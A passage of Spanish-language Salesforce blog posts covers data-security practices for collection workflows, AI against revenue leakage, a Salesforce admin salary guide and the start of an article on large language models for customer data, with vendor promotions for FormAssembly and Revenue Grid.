
Cómo mantener la seguridad en los flujos de trabajo de recopilación de datos de Salesforce

Última actualización el 18 de agosto de 2023 por Rakesh Gupta

La seguridad de los datos debe ser una de sus principales prioridades si recopila, almacena y administra información personal. La protección de datos es especialmente importante si sus flujos de trabajo de recopilación de datos de Salesforce se integran con varias herramientas, como un generador de formularios web o un sistema de pago.

Muchas regiones e industrias tienen leyes estrictas de privacidad de datos, que incluyen GDPR, GLBA, HIPAA y otras, que rigen la forma en que las organizaciones manejan los datos. Puede garantizar la seguridad y el cumplimiento de los datos a lo largo de sus flujos de trabajo de recopilación de datos de Salesforce de varias maneras, incluido el enmascaramiento y el cifrado de datos, el control y los permisos de acceso, y el monitoreo regular.

Comprender la importancia de mantener los datos seguros

Los datos confidenciales son todos los datos que se pueden usar para identificar a una persona o dañarlos si se pierden o son robados. Los tipos de datos confidenciales incluyen:

Información de identificación personal
información de salud protegida
Registros financieros o educativos
Datos étnicos, políticos y biométricos

Mantener la seguridad de los datos personales ayuda a generar confianza con las personas que comparten su información personal con usted. También garantiza que su organización evite sanciones por incumplimiento de las leyes de privacidad de datos.

Prácticas recomendadas de seguridad al recopilar datos

Su organización es responsable de asegurarse de que las herramientas de recopilación de datos que utiliza tengan implementadas las medidas de seguridad adecuadas. Podrá proteger mejor los datos confidenciales desde el momento en que se recopilan, a medida que se mueven a través de sus flujos de trabajo y cuando se trasladan a Salesforce.

Enmascarar campos sensibles

El enmascaramiento de campo ayuda a garantizar que los datos confidenciales se mantengan confidenciales y no se expongan innecesariamente a usuarios no autorizados.

Cifrar datos

El cifrado de datos ayuda a proteger los datos confidenciales contra el acceso, uso o robo no autorizados, ya sea que estos datos estén en reposo o en tránsito.

Limite el acceso a los datos

La implementación de control de acceso y permisos garantiza que solo los usuarios autorizados puedan acceder o modificar los datos.

Supervisar y auditar flujos de trabajo

La vigilancia constante ayuda a garantizar que los flujos de trabajo de recopilación de datos mantengan el nivel adecuado de seguridad para mantener seguros los datos confidenciales.

2 formas de mejorar la seguridad en los flujos de trabajo de recopilación de datos de Salesforce

Un flujo de trabajo de recopilación de datos de varios pasos tendrá diferentes puntos de entrada con posibles riesgos de seguridad, como formularios, correos electrónicos y cargas de archivos. Es importante que en cada paso de sus procesos de datos, tenga medidas de seguridad para garantizar que personas no autorizadas no accedan a datos o archivos.

Asegúrese también de probar continuamente sus flujos de trabajo de recopilación de datos de Salesforce en busca de vulnerabilidades de seguridad. La detección temprana de amenazas disminuirá la posibilidad de una violación de datos u otras consecuencias graves.

Implementar reglas de retención de datos

La creación de una política clara de retención de datos es fundamental para definir cómo su organización maneja los datos con fines de cumplimiento. Es importante establecer reglas sobre qué datos deben conservarse y durante cuánto tiempo, así como reglas sobre quién tiene acceso y cómo deshacerse de los datos correctamente una vez que ya no se necesitan.

Acceso a los datos

Establecer reglas de acceso a datos como parte de su política de retención de datos garantizará que solo los usuarios autorizados en un flujo de trabajo tengan acceso a datos confidenciales. Los controles administrativos también pueden incluir el requisito de que los usuarios inicien sesión para ver o modificar las listas de respuestas del flujo de trabajo.

Purga de datos

Dentro de su flujo de trabajo, la configuración de reglas de depuración de datos puede garantizar que los datos de respuesta se eliminen de forma permanente una vez que ya no los utilice. Personalice esta configuración de depuración de datos, como la frecuencia con la que se completa una depuración, según sus requisitos de retención de datos.

Aproveche las aprobaciones del flujo de trabajo

Establecer pasos de aprobación dentro de los flujos de trabajo es importante para garantizar la responsabilidad durante el proceso de recopilación de datos. Los pasos de aprobación dentro de un flujo de trabajo significan que ningún usuario tiene control total sobre los cambios o decisiones de datos, lo que ayuda a mejorar la seguridad y la confidencialidad.

Detección de errores

Los pasos de aprobación en un flujo de trabajo proporcionan un proceso de revisión de datos estándar antes de que los datos se acepten o utilicen oficialmente. Esto ayuda a reducir las incoherencias y los errores, así como a garantizar el cumplimiento de las normas de privacidad de datos pertinentes.

Pista de auditoría

Los registros de auditoría para las aprobaciones de flujos de trabajo simplifican el proceso al registrar cada paso de aprobación y crear un registro histórico de los cambios realizados en los datos. También se pueden utilizar durante las investigaciones en caso de brechas de seguridad o problemas de datos.

Simplificación de los flujos de trabajo de recopilación de datos de Salesforce con FormAssembly

Cuando se trata de proteger los flujos de trabajo de datos, es fundamental contar con políticas de privacidad y seguridad de datos. Su organización puede beneficiarse del uso de una única plataforma de flujo de trabajo y recopilación de datos como FormAssembly, que facilita la centralización de la protección contra amenazas y garantiza el cumplimiento. Este enfoque le permite escalar más fácilmente, auditar los flujos de datos de forma centralizada y aumentar la eficiencia, al mismo tiempo que maximiza la seguridad en todos sus flujos de trabajo de recopilación de datos de Salesforce.

La potente plataforma conectada a Salesforce de FormAssembly combina la recopilación de datos segura y compatible con un generador de procesos visual e inteligente que le permite crear procesos complejos que incluyen formularios, correos electrónicos, integraciones y más, todo sin código.

Descubra cómo FormAssembly puede ayudarlo a optimizar sus flujos de trabajo de recopilación de datos de Salesforce mientras mantiene seguros los datos confidenciales.

👉 Más información sobre el flujo de trabajo de FormAssembly

Evaluación formativa:

¡Quiero saber de ti!

¿Qué es una cosa que aprendiste de esta publicación? ¿Cómo imagina aplicar este nuevo conocimiento en el mundo real? Siéntase libre de compartir en los comentarios a continuación.

Seguir leyendo

admin ai Blog invitado Campeón de automatización CI Cómo Conocimiento Crear un registro Data Datos Datos de Salesforce Eficiencia EGA Futura el flujo flow Flows flujo Flujo de trabajo de FORMAssembly Flujos FormAsse FormAssembly ga GDPR Generador de procesos Herramientas INCLUIR INCLUYE Integraciones Plataforma privacidad de datos Proceso Process Builder Recopilación de datos Registro Reseñas de aplicaciones Respuesta Respuestas REST RGPD Salesforce security seguridad Seguridad de datos sin código Sitio web de recopilación de datos para Salesforce Tema TI UI

Lucha contra las fugas de ingresos con inteligencia artificial, datos y poder administrativo

Última actualización el 18 de agosto de 2023 por Rakesh Gupta

La fuga de ingresos es la amenaza oculta a la que se enfrentan todas las empresas. Desde las etapas iniciales de calificación de clientes potenciales hasta las ventas adicionales y cruzadas, los ingresos potenciales pueden perderse en cualquier punto del embudo de ventas debido a brechas e ineficiencias.

En este artículo, exploraremos cómo las empresas pueden utilizar la inteligencia artificial (IA) y los datos para combatir la fuga de ingresos junto con la experiencia de los administradores de Salesforce.

En su forma más simple, la fuga de ingresos es la pérdida de ingresos ganables debido a errores no forzados y desalineaciones en el proceso de generación de ingresos. Según Boston Consulting Group , las débiles estrategias de lanzamiento al mercado están causando que las empresas pierdan $2 billones al año en ingresos potenciales perdidos y costos excesivos.

Profundizaremos en este tema crítico en Dreamforce en San Francisco del 12 al 14 de septiembre de 2023. Como orgulloso patrocinador del evento, Revenue Grid compartirá información sobre cómo las empresas pueden abordar de manera efectiva la fuga de ingresos utilizando el poder de la IA y los datos. . Nuestra misión es simple: capacitar a las empresas para salvaguardar sus ingresos ganados con tanto esfuerzo y, como administrador de Salesforce, ¡usted tiene la clave de esta iniciativa! Únase a nosotros en Dreamforce para sumergirse en el emocionante mundo de la protección de ingresos impulsada por IA y descubra cómo abordar este desafío comercial crítico.

Revolucionando la batalla contra las fugas de ingresos con IA

La lucha contra la fuga de ingresos nunca ha sido un trabajo fácil. Con el auge de la IA generativa, surge una poderosa herramienta contra las fugas de ingresos, que transforma la forma en que las empresas combaten este desafiante problema. La adopción de IA entre las organizaciones B2B está en constante aumento. La investigación de McKinsey indica que el 90 % de los líderes comerciales prevé utilizar con frecuencia soluciones de IA generativa en los próximos dos años. Además, las organizaciones que invierten en IA están experimentando aumentos sustanciales en los ingresos, que van del 3 % al 15 %, según el mismo informe.

La IA es un poderoso aliado en la lucha contra las fugas de ingresos. Sin embargo, no puede hacerlo solo. El punto clave a entender es que la IA aprende de los datos generados por humanos. En términos más simples, la efectividad de la IA está directamente relacionada con la calidad de sus datos. Para aprovechar al máximo el potencial de la IA y desbloquear sus capacidades para la protección de los ingresos, es esencial conectar datos fiables y confiables de diversas fuentes.

Sin embargo, en muchas organizaciones, los datos se aíslan con frecuencia en varios sistemas, creando silos. Incluso las grandes organizaciones con sólidos procedimientos de gestión de datos a menudo se encuentran con problemas de calidad de los datos, como la falta de datos en su CRM. Esta realidad nos enfrenta a un círculo vicioso, ya que los datos incorrectos son una de las causas más comunes de fuga de ingresos . Sin garantizar la integridad de los datos y aprovechar la IA, combatir de manera efectiva las fugas de ingresos se convierte en una tarea imposible.

Garantizar la integridad de los datos incluye manejar la seguridad y abordar las preocupaciones de cumplimiento que requieren conocimientos técnicos y experiencia específica. Con sus conocimientos y habilidades, los administradores de Salesforce desempeñan un papel vital en cerrar la brecha entre las capacidades de IA y la calidad de los datos, lo que permite a las empresas combatir las fugas de ingresos de manera efectiva.

Garantizar la integridad de los datos con captura de actividad y poder administrativo

Una de las principales razones detrás de los problemas de datos para las empresas es la dependencia de los procesos manuales, lo que puede conducir a la entrada de datos que requiere mucho tiempo y mano de obra, lo que resulta en datos faltantes, errores y duplicados en CRM.

La captura de actividad automatizada supera estos desafíos al ofrecer una alternativa efectiva a la entrada manual de datos. Al recopilar y guardar el 100 % de los datos de actividad en varios puntos de contacto con el cliente, las soluciones de captura de actividad eliminan los errores de entrada de datos y garantizan datos precisos y siempre actualizados en Salesforce.

Además, tener datos completos permite a las empresas ver el panorama general, lo que les permite evaluar el estado de la tubería e identificar acuerdos que se están moviendo, estancados o en riesgo, ayudándolos a identificar posibles fugas antes de que ocurran. Además, la captura de actividad automatizada mejora la eficiencia al liberar a los equipos de ventas de dedicar tiempo a la entrada manual de datos.

Si bien la captura de actividad parece ser la solución ideal para garantizar la integridad de los datos, no todas las herramientas de captura de actividad se crean de la misma manera y algunas pueden tener serias desventajas. Estos pueden incluir no tener datos reportables en Salesforce, opciones de sincronización personalizables limitadas, falta de sincronización bidireccional que causa problemas de programación y vulnerabilidades de seguridad debido a la ausencia de opciones de implementación en la nube privada y local.

La experiencia y los conocimientos técnicos de los administradores de Salesforce son cruciales para superar con éxito estos desafíos. Capacitar a los administradores para elegir e implementar la solución de captura de actividad adecuada y manejar los problemas relacionados con los datos cuando ocurren garantiza el mantenimiento de datos de CRM de alta calidad.

Aprovechar la IA para combatir la fuga de ingresos

Con la integridad de los datos asegurada, el motor de IA ahora se alimenta con información esencial y está listo para actuar. Los datos de actividad incluyen señales invaluables sobre la canalización, las oportunidades de ventas y las brechas potenciales en los procesos. Identificar estos conocimientos requiere un análisis profundo de los datos, lo que es imposible con la evaluación manual. AI automatiza el análisis de datos para visualizar el estado de la tubería e identificar las brechas de ejecución que indican fugas de ingresos.

A continuación, la IA crea información procesable a través de la inteligencia de ingresos. Después de analizar cantidades masivas de datos, la IA detecta patrones y los transforma en información procesable a través de recomendaciones de IA contextuales y en tiempo real. Esto brinda a los equipos la orientación que necesitan para abordar la posible fuga de ingresos de inmediato.

El paso final es garantizar que se sigan estas recomendaciones y evaluar su eficacia. Las funciones de informes avanzados y las señales de IA muestran el impacto exacto en tiempo real a medida que evoluciona la canalización. Esto permite los ajustes necesarios en los procesos y establece una plataforma de ejecución para implementar cambios en toda la empresa y mejoras en los procesos para combatir las fugas de ingresos en toda la empresa.

Únase a nuestras sesiones de oratoria de Dreamforce para obtener más información

La fuga de ingresos es un problema comercial crítico que debe manejarse, y la IA surge como una herramienta poderosa para abordarlo. Para aprovechar al máximo el potencial de la IA, es esencial combinarla con datos de calidad. Aquí es donde los administradores de Salesforce juegan un papel fundamental, potenciando la IA con datos valiosos y aprovechando su experiencia y conocimientos técnicos para combatir las fugas de ingresos de manera efectiva.

Si está ansioso por obtener más información sobre cómo la IA puede revolucionar sus estrategias de protección de ingresos, lo invitamos a unirse a nuestras sesiones de conferencias de Dreamforce . ¡Encuéntrenos en el stand n.º 1126 para explorar las emocionantes posibilidades de la optimización de ingresos impulsada por IA!

Maria Gordienko es directora de comunicaciones de Revenue Grid.

Evaluación formativa:

¡Quiero saber de ti!

¿Qué es una cosa que aprendiste de esta publicación? ¿Cómo imagina aplicar este nuevo conocimiento en el mundo real? Siéntase libre de compartir en los comentarios a continuación.

Seguir leyendo

Actividad admin administrador Administrador de Salesforce Administradores administradores de salesforce ai AMA Análisis Automation Champion Blog de invitados Business CI cli clientes potenciales Cloud Cómo Conectar Connect Conocimiento contacto Costo CRM CRO Data Datos Dreamforce Eficiencia EGA Futura Empresa Empresas Estrategia Evento Funciones ga Gestión de datos Herramientas IA generativa INCLUDE INCLUDES INCLUIR INCLUYE Informe Informes inteligencia inteligencia artificial Investigación Lead Nube Oportunidad Otros PCI Plataforma platform Procedimientos Proceso Procesos manuales Quip Reseñas de aplicaciones Salesforce security seguridad Tarea Tema Temas TI Tools UI Ventas

Guía salarial de administrador de Salesforce (+ consejos para ganar más) – Inspire Planner

Una estadística sorprendente de Skuid revela que entre el 20 y el 70 % de los proyectos de CRM fallan debido a la falta de experiencia profesional. Las empresas sin administradores de Salesforce capacitados son similares a los propietarios de automóviles costosos de alto rendimiento pero sin licencia de conducir. Lo tienes, pero no puedes usarlo en todo su potencial. Como un hábil conductor detrás del volante, los administradores de Salesforce garantizan el funcionamiento perfecto de Salesforce, la plataforma de CRM líder en el mundo. Pueden adaptar la plataforma para que se adapte a las necesidades comerciales únicas, navegando sus complejidades con facilidad. Pero surge una pregunta importante: ¿qué factores influyen significativamente en el salario de un administrador de Salesforce?

En esta Guía de salario de administrador de Salesforce, profundizaremos en estas preguntas y descubriremos información crucial en el camino. A partir de esta guía, puede esperar descubrir:

El papel fundamental de un administrador de Salesforce en la industria tecnológica
Un análisis completo de los salarios de los administradores de Salesforce, teniendo en cuenta factores como la experiencia, la ubicación, la industria y las certificaciones.
El impacto de las certificaciones y la experiencia en el salario de un administrador de Salesforce
Variaciones geográficas de los salarios de los administradores de Salesforce en EE. UU., India y en todo el mundo
Efecto de los cambios de trabajo frente a la permanencia en el trabajo en la progresión salarial del administrador de Salesforce
Consejos prácticos para los administradores de Salesforce que buscan aumentar sus ingresos

Profundicemos y desentrañemos los aspectos importantes de ser un administrador de Salesforce exitoso.

¿Qué hace un administrador de Salesforce?

Los administradores de Salesforce tienen muchas funciones. Administran usuarios, datos y seguridad, personalizan Salesforce para satisfacer las necesidades comerciales, crean informes y paneles y brindan capacitación a los usuarios finales. Su función requiere una combinación de habilidades técnicas y blandas, incluida la resolución de problemas, la comunicación, la gestión de proyectos y una comprensión profunda de las funcionalidades de Salesforce.

Según un estudio realizado por IDC, se prevé que el ecosistema de Salesforce, incluidos sus clientes y socios, genere 9,3 millones de nuevos puestos de trabajo y contribuya a $1,6 billones en nuevos ingresos comerciales a nivel mundial para 2026. A medida que más empresas adopten Salesforce, el papel de Salesforce Los administradores solo se volverán más fundamentales, haciendo de esta profesión no solo un trabajo, sino una opción de carrera próspera.

Salario de administrador de Salesforce en los EE. UU.

Salario de nivel de entrada y salario promedio anual del administrador de Salesforce

Según Payscale, para aquellos que recién comienzan su viaje como administradores de Salesforce, el salario inicial en los EE. UU. es de aproximadamente $ 61,000 por año. Esta cifra representa el salario inicial estándar para los administradores que tienen menos de un año de experiencia. La cifra puede cambiar según variables como la ubicación, la industria y el tamaño de la empresa.

El salario anual promedio de los administradores de Salesforce en los EE. UU. es de alrededor de $ 73,500. Esta cifra es un promedio de varios niveles de experiencia, industrias y ubicaciones dentro de los EE. UU. Incluye el salario base, aguinaldos, participación en las utilidades y cualquier otro beneficio económico, en su caso.

Variaciones del salario del administrador de Salesforce según la experiencia y la industria

Con 2 a 5 años de experiencia, los administradores pueden esperar ganar alrededor de $71,000 por año. Los administradores sénior de Salesforce con más de 5 años de experiencia pueden ganar entre $86 000 y $92 000 por año, según los datos de Payscale.

La industria también juega un factor clave en la determinación del salario. Por ejemplo, los administradores de Salesforce en los sectores de tecnología y finanzas a menudo ganan más que los de otras industrias debido a la mayor demanda y complejidad de las tareas en estos sectores.

Variaciones geográficas en el salario del administrador de Salesforce

La ubicación geográfica es otro factor clave que influye en los salarios. Los estados que tienen costos de vida más altos, como California y Nueva York, frecuentemente ofrecen salarios más altos como contrapeso. De manera similar, los estados con una alta concentración de empresas tecnológicas, como Washington y Texas, también tienden a ofrecer salarios más altos debido al mercado laboral competitivo.

Salesforce Admin Salario en India

India es uno de los mercados más grandes para el talento tecnológico y juega un papel crucial en el ecosistema de Salesforce. Los ingresos de los administradores de Salesforce en la India también están determinados por numerosas variables, como la experiencia, la ubicación geográfica, la industria y las certificaciones.

Según Talent.com, la estructura del salario del administrador de Salesforce en India varía ampliamente, dependiendo de varios factores. En promedio, pueden esperar ganar ₹ 1,100,000 por año. Para aquellos que recién comienzan su viaje de Salesforce, los salarios de nivel de entrada son alrededor de ₹ 500,000 por año.

Sin embargo, a medida que los administradores de Salesforce acumulan experiencia y perfeccionan sus habilidades, su potencial de ingresos crece significativamente. Los profesionales más experimentados en este campo pueden obtener salarios de hasta ₹ 1 737 500 por año, lo que demuestra la importante progresión financiera posible en esta carrera.

Salario del administrador de Salesforce a nivel mundial

En el panorama tecnológico en constante evolución, los administradores de Salesforce desempeñan un papel fundamental a nivel mundial. Aquí hay un resumen de los salarios promedio de los administradores de Salesforce en varios países a través de diferentes niveles de experiencia:

Salesforce Admin Salary Guide Globally de Inspire Planner, una aplicación de gestión de proyectos nativa de Salesforce

Estos números pueden variar según numerosos factores, incluidos el país, la industria y el tamaño de la organización. A medida que los administradores obtienen más experiencia y dominan las funcionalidades de Salesforce, sus salarios aumentan significativamente.

Influencia de la certificación y la experiencia en el salario

El poder de las certificaciones y la experiencia de Salesforce para configurar el salario de un administrador de Salesforce no se puede subestimar. Según la Encuesta de salarios de Mason Frank, se reveló que el 43% de los encuestados vieron un aumento en su salario después de obtener una certificación, lo que destaca la correlación directa entre la mejora profesional y las recompensas financieras.

También es fundamental centrarse estratégicamente en las certificaciones más pertinentes. La certificación de Administrador Avanzado, por ejemplo, es muy buscada ya que valida la experiencia en características y funcionalidades avanzadas de Salesforce. Del mismo modo, tener una certificación de Platform App Builder puede brindar una ventaja considerable para aquellos que aspiran a validar su competencia en el diseño, la creación y la implementación de aplicaciones personalizadas en la plataforma Salesforce.

La experiencia también tiene un peso inmenso en el salario de un administrador de Salesforce. El mismo estudio de Mason Frank sugiere que un profesional de Salesforce con más de cinco años de experiencia puede ganar hasta un 20% más que sus contrapartes con menos experiencia.

Sin embargo, si bien es beneficioso tener múltiples certificaciones, es crucial equilibrar esto con la adquisición de experiencia en el mundo real. Los empleadores valoran la experiencia práctica, por lo que centrarse únicamente en las certificaciones sin aplicar las habilidades aprendidas podría hacerte parecer sobrecualificado o fuera de contacto con los aspectos prácticos del puesto.

Tenencia de trabajo vs. Salto de trabajo: ¿Qué afecta más la progresión salarial?

En el sector de la tecnología, y específicamente dentro de los roles de Salesforce, a menudo vemos una mezcla de experiencias. Para algunos, la lealtad a una sola organización conduce a una progresión salarial constante, especialmente si pueden obtener un ascenso dentro de la organización. Sin embargo, otros descubren que cambiar de trabajo cada pocos años acelera el crecimiento de su salario de administrador de Salesforce debido a la "prima de salto de trabajo".

Según los hallazgos del Instituto de Investigación ADP, los empleados que se apegan a sus trabajos han visto crecer sus salarios en un 5,9 %, mientras que aquellos que cambian de trabajo ven un salto mayor, con un aumento del 8,0 %.

Sin embargo, no se trata solo de perseguir el salario más alto. Cambiar de trabajo puede conducir potencialmente a percepciones de inestabilidad o falta de compromiso, lo que podría afectar las perspectivas laborales futuras. Por otro lado, permanecer en una empresa durante un período prolongado podría limitar la exposición a diversas experiencias y, potencialmente, ralentizar el ritmo de desarrollo de habilidades y progresión profesional.

Por lo tanto, si bien cambiar de trabajo puede generar una ganancia financiera inmediata, considere otros factores, como las oportunidades de aprendizaje, la cultura laboral, el equilibrio entre el trabajo y la vida personal y el crecimiento profesional a largo plazo al tomar tales decisiones. Después de todo, una carrera satisfactoria es algo más que las cifras de su cheque de pago.

Consejos para aumentar el salario del administrador de Salesforce

Estos son algunos consejos prácticos para los administradores de Salesforce que buscan aumentar sus ingresos.

Obtenga certificaciones de Salesforce : Salesforce ofrece una variedad de certificaciones que certifican su comprensión y experiencia en varias facetas de la plataforma. Las certificaciones como Administrador avanzado o Creador de aplicaciones de plataforma no son solo muestras de su dedicación para dominar la plataforma; también dan fe de su capacidad para manejar tareas más complejas. Obtener estas certificaciones puede mejorar considerablemente su valor de mercado.
Especialícese en un área particular : aunque la versatilidad es un rasgo deseable en los administradores de Salesforce, perfeccionar un área específica puede aumentar su valor para las empresas. Por ejemplo, centrarse en CPQ (Configurar, Precio, Cotizar) puede abrir oportunidades en sectores donde la fijación de precios de productos o servicios es compleja. Al convertirse en un experto en CPQ, se posiciona como un especialista que puede optimizar procesos complejos, aumentando así su potencial de ingresos. Consulte nuestra guía para conocer los mejores recursos para la capacitación de Salesforce.
Agregue valor al negocio : los administradores de Salesforce pueden aumentar su salario demostrando su valor para el negocio. Esto podría implicar la automatización de procesos en Salesforce, la implementación de nuevas funciones que aumenten la eficiencia o la capacitación de usuarios finales para utilizar mejor la plataforma. Al mostrar cómo su trabajo contribuye a los resultados de la empresa, puede presentar argumentos sólidos a favor de un salario más alto. Aquí puede encontrar más consejos sobre cómo ser un administrador de Salesforce exitoso.
Comprenda su valor : use recursos como la Encuesta anual de salarios de Mason Frank, Payscale o Glassdoor para obtener una imagen realista de cuál es el salario típico de un administrador de Salesforce según su ubicación, industria y nivel de experiencia. Esto lo ayuda a medir su valor de mercado y proporciona una base para comenzar las negociaciones.
Esté preparado : antes de la negociación, enumere sus principales contribuciones y logros. Incluya proyectos o iniciativas específicas que hayan tenido un impacto sustancial en el negocio. Esto puede proporcionar evidencia convincente de su valía.
Practique la escucha activa : la negociación no se trata solo de hacer demandas; también se trata de comprender la perspectiva de la otra parte. Escuchar puede ayudarlo a identificar lo que es importante para el empleador y encontrar puntos en común.
Busque un mentor : busque profesionales que estén un par de etapas por delante de usted en su carrera en Salesforce, preferiblemente de 2 a 5 años. Estas personas tendrán una experiencia reciente y relevante que se alinea estrechamente con los desafíos que es probable que encuentre.

Resumen

A medida que la ola de transformación digital sigue aumentando, la demanda de administradores de Salesforce capacitados se dispara. En particular, las funciones de estos profesionales se extienden más allá de la competencia técnica y exigen una combinación armoniosa de habilidades blandas y una comprensión profunda de los procesos comerciales.

No se puede subestimar la influencia de las certificaciones, la experiencia y la ubicación geográfica en el salario de un administrador de Salesforce. Un administrador certificado de Salesforce, especialmente con habilidades de nicho como CPQ, puede esperar un aumento salarial, con incrementos adicionales paralelos a su experiencia acumulada. Los datos muestran que los cambios frecuentes de trabajo también pueden contribuir a un aumento más rápido de los ingresos en comparación con permanencias más largas en una empresa.

Sin embargo, no se trata solo de buscar certificaciones o cambiar de trabajo. La creación de una red sólida, la búsqueda de mentores y el perfeccionamiento de sus habilidades de negociación son esenciales para mejorar su valor y, en consecuencia, su potencial de ingresos.

Para los posibles administradores de Salesforce o los experimentados que buscan avanzar, recuerde que es una combinación de aprendizaje continuo, movimientos profesionales estratégicos y aprovechar la vibrante comunidad de Salesforce lo que lo colocará en los tramos salariales más altos.

Seguir leyendo

admin administrador administrador certificado de Salesforce Administrador de Salesforce Administradores administradores de salesforce Administrator AMA Análisis Aplicaciones Automatización Automatización de procesos Business capacitación de Salesforce Carrera Certificación Certificación de Platform App Builder Certificaciones CI cli Cómo Comunidad Comunidad de Salesforce contacto Costo CPQ creador de aplicaciones Creador de aplicaciones de plataforma Crecimiento CRM cuenta Data Datos Desarrollo Eficiencia EGA Futura Empresa Empresas Encuesta Formación de Salesforce Funciones ga Gestión de proyectos INCLUDE INCLUDES INCLUYE Informe Informes Investigación Lead Móvil Negocio Oportunidad Otros PCI Plataforma Plataforma de Salesforce Plataforma Salesforce platform Platform App Builder Preguntas Proceso Product Producto productos Rendimiento Salesforce salesforce-admin seguridad Tarea Tecnología Tema TI transformación digital UI Validar

4 formas en que los modelos de lenguaje grande lo ayudan a hacer más con los datos del cliente

A medida que las empresas buscan formas de atender a los clientes de manera más eficiente, muchas se dan cuenta de los beneficios de la IA generativa . Esta tecnología puede ayudarlo a simplificar sus procesos, organizar datos, brindar un servicio más personalizado y más. ¿Qué potencia la IA generativa? Modelos de lenguaje grande (LLM), que permiten que la IA generativa cree contenido nuevo a partir de los datos que ya tiene.

Lo que es más importante, la tecnología de IA generativa puede ahorrar tiempo en procesos tediosos, por lo que puede brindar una mejor atención a sus clientes y concentrarse en estrategias generales. Profundicemos en cómo la IA generativa puede ayudar a su empresa a hacer más y aprendamos más sobre modelos de lenguaje grandes.

¿Qué son los modelos de lenguaje grande?

La IA generativa está impulsada por grandes modelos de aprendizaje automático que se entrenan previamente con grandes cantidades de datos que se vuelven más inteligentes con el tiempo. Como resultado, pueden producir contenido nuevo y personalizado, como audio, código, imágenes, texto, simulaciones y video, según los datos a los que puedan acceder y las indicaciones utilizadas.

Para poner las cosas en un contexto cotidiano, los grandes modelos de lenguaje brindan respuestas dependiendo de cómo se formule una pregunta. Por ejemplo, “¿ qué son los LLM y cómo pueden ayudar a mi negocio? ” versus “¿qué son los LLM y qué valor pueden aportar a mi negocio?” arrojará resultados diferentes. Aunque las preguntas son similares, las respuestas pueden variar según el contexto.

Debido a que estos modelos utilizan el procesamiento del lenguaje natural y las capacidades de aprendizaje automático, los LLM responden de una manera similar a la humana, coherente y identificable. Como resultado, sobresalen en tareas como traducción de textos, resúmenes y conversaciones.

Con la IA generativa que ayuda a las empresas a realizar estas tareas , la confianza debe estar en el centro de sus esfuerzos. Para asegurarse de que está utilizando esta tecnología de manera responsable, puede invertir en una plataforma de gestión de relaciones con los clientes que tenga una capa de confianza centrada en la IA , que anonimiza los datos para proteger la privacidad de los clientes.

Una capa de confianza integrada en un entorno de IA generativa puede abordar los requisitos de seguridad, privacidad y cumplimiento de los datos. Pero para cumplir con altos estándares, también debe seguir las pautas de innovación responsable para asegurarse de que está utilizando los datos de los clientes de manera segura, precisa y ética.

¿Cómo funcionan los modelos de lenguaje grande?

Los avances en la infraestructura informática y la IA continúan simplificando la forma en que las empresas integran grandes modelos de lenguaje en su entorno de IA. Si bien estos modelos están capacitados en enormes cantidades de datos públicos, puede usar plantillas de solicitud que requieren una codificación mínima para ayudar a los LLM a brindar las respuestas correctas para sus clientes.

Además, ahora puede crear LLM privados capacitados en conjuntos de datos específicos de dominio que residen en entornos de nube seguros. Cuando un LLM se capacita utilizando datos de la industria, como para uso médico o farmacéutico, proporciona respuestas que son relevantes para ese campo. De esta manera, la información que ve el cliente es precisa.

Los LLM privados reducen el riesgo de exposición de datos durante el entrenamiento y antes de que los modelos se implementen en producción. Puede mejorar la precisión de la predicción entrenando un modelo con datos ruidosos, donde se agregan valores aleatorios en el conjunto de datos para imitar los datos del mundo real antes de limpiarlos.

También es más fácil mantener la privacidad de los datos de una persona utilizando fuentes de datos descentralizadas que no tienen acceso directo a los datos de los clientes. A medida que la seguridad y el gobierno de los datos se convierten en una prioridad principal, las plataformas de datos empresariales que cuentan con una capa de confianza se vuelven más importantes.

Las empresas también pueden aprovechar cómo funcionan los LLM con otros tipos de IA. Imagine usar la IA tradicional para predecir lo que los clientes pueden planear hacer a continuación (basándose en datos de tendencias y comportamientos anteriores), y luego usar un LLM para traducir los resultados de la predicción en acciones.

Por ejemplo, puede usar IA generativa para crear correos electrónicos de clientes personalizados con ofertas, crear campañas de marketing para un nuevo producto, resumir un caso de servicio o escribir código para desencadenar acciones como recomendaciones de clientes.

Estos grandes modelos lingüísticos ahorran tiempo y dinero al agilizar los procesos manuales, liberando a sus empleados para un trabajo más emprendedor.

Ahora que ha aprendido lo que puede hacer la IA generativa, veamos cómo puede usarla para ayudar a su empresa.

¿Qué es la IA generativa?

La IA generativa puede crear cosas increíbles con los datos que ya tiene y ayudarlo a funcionar de manera más eficiente. Obtenga más información sobre esta tecnología y vea cómo está cambiando los negocios.

4 formas en que la IA generativa puede ayudar a su empresa

El cielo es el límite cuando se trata de formas en que puede usar la IA generativa para su negocio .

Los LLM son excelentes para reconocer patrones y conectar datos por sí mismos. La IA predictiva y tradicional, por otro lado, aún puede requerir mucha interacción humana para consultar datos, identificar patrones y probar suposiciones.

Al alimentarse de los datos de los clientes en tiempo real, la IA generativa puede traducir instantáneamente conjuntos de datos complejos en información fácil de entender. Esto le ayuda a usted y a sus empleados a tener una visión más clara de sus clientes, para que pueda tomar medidas en función de la información actualizada.

Ahora profundicemos en algunos casos de uso en los que los modelos de lenguaje grandes pueden ayudar a su empresa.

Uso del análisis de sentimientos para obtener contexto en las acciones posteriores a la compra

El análisis de sentimientos puede ayudar a los especialistas en marketing, ventas y servicios a comprender el contexto de los datos del cliente para las acciones posteriores a la compra. Por ejemplo, puede usar LLM para segmentar a los clientes en función de sus datos, como usar reseñas negativas publicadas en el sitio web de su marca. Estos conocimientos pueden ayudarlo a actuar de inmediato ante los comentarios negativos. Una gran estrategia de marketing sería enviar un mensaje personalizado ofreciendo al cliente una oferta especial para una futura compra. Esto puede ayudar a mejorar lealtad a la marca, confianza del cliente, retención y personalización.

Generación de texto de correo electrónico para campañas de marketing.

La generación de texto puede ayudar a los especialistas en marketing a reducir el tiempo que dedican a preparar campañas. La IA generativa puede producir recomendaciones, eventos de lanzamiento, ofertas especiales y oportunidades de participación del cliente para sus plataformas de redes sociales. Luego, puede pulir el texto para asegurarse de que tenga la voz y el tono de su empresa. Por ejemplo, puede usar la copia producida por la IA generativa para enviar correos electrónicos personalizados que informen a los clientes sobre el lanzamiento de un nuevo producto. Esto ayuda a mejorar la personalización, brindando a sus clientes una experiencia más consistente.

Presentación de casos relacionados para agentes de servicio

